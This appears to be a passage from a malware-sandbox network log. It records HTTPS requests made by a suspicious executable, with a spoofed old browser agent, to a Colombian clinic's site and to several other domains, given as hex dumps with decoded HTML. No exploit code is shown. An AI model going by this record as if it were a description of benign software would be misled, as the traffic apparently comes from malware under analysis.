                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5858INData Raw: 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 75 6c 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: em-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid"><div class="g-block size-100"><ul class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5860INData Raw: 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63
                                                                                                                                                                                                                                                                          Data Ascii: s-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></li></ul></div></div></li></ul></li><li c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5861INData Raw: 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 39 20 20 22 3e
                                                                                                                                                                                                                                                                          Data Ascii: <a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-399 ">
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5862INData Raw: 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 39 20 20
                                                                                                                                                                                                                                                                          Data Ascii: tem-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-119
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5864INData Raw: 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 38 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                          Data Ascii: /copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-component g-menu-item-388 g-standard "><a class="g-menu-it
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5865INData Raw: 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67 72 6f 75 6e 64 20 63 6f 6c 6f 72 2a 2f 0d 0a 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 29 3b 2f 2a 70 6f 70 75 70 20 66 6f 6e 74 20 63 6f 6c 6f 72 2a 2f
                                                                                                                                                                                                                                                                          Data Ascii: gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup background color*/color: rgba(0, 0, 0, 0);/*popup font color*/
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5866INData Raw: 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 22 3e 3c 2f 64 69 76 3e 27 2c 0d 0a 09 09 09 09 77 72 61 70 20 20 20 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66
                                                                                                                                                                                                                                                                          Data Ascii: , autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafancybox-overlay379"></div>',wrap : '<div class="gaf
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5868INData Raw: 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74
                                                                                                                                                                                                                                                                          Data Ascii: ="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener"><img style="display: block; margin-left: auto; margin-right
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5869INData Raw: 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 69 74 61 2d 6d 65 64 69 63 61 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 34 22 3e 41 67 65 6e 64 61 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c
                                                                                                                                                                                                                                                                          Data Ascii: img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"><a href="/index.php/contacto/cita-medica" class="button button-4">Agenda</a></div></div></div> </div></div></div><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5870INData Raw: 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 33 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 31 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 33 2f 50 61 67 69 6e 61 5f 57 65 62 5f 31 2d 30 31 2e 6a 70 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c
                                                                                                                                                                                                                                                                          Data Ascii: class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-3 g-animatedblock-animation-1"><img src="/images/2023/Pagina_Web_1-01.jpg" alt="image" /><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5872INData Raw: 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65
                                                                                                                                                                                                                                                                          Data Ascii: olio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5873INData Raw: 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                          Data Ascii: romoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5874INData Raw: 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66
                                                                                                                                                                                                                                                                          Data Ascii: "g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><f
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5876INData Raw: 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20
                                                                                                                                                                                                                                                                          Data Ascii: as citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5877INData Raw: 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                          Data Ascii: text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5878INData Raw: 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69
                                                                                                                                                                                                                                                                          Data Ascii: <div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-parti
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5880INData Raw: 34 36 38 0d 0a 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70
                                                                                                                                                                                                                                                                          Data Ascii: 468il-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><scrip
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5881INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          43192.168.2.6177794.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5847OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5847INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5847INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          44192.168.2.61815188.114.96.7443C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5847OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.se
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5881INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:44 GMT
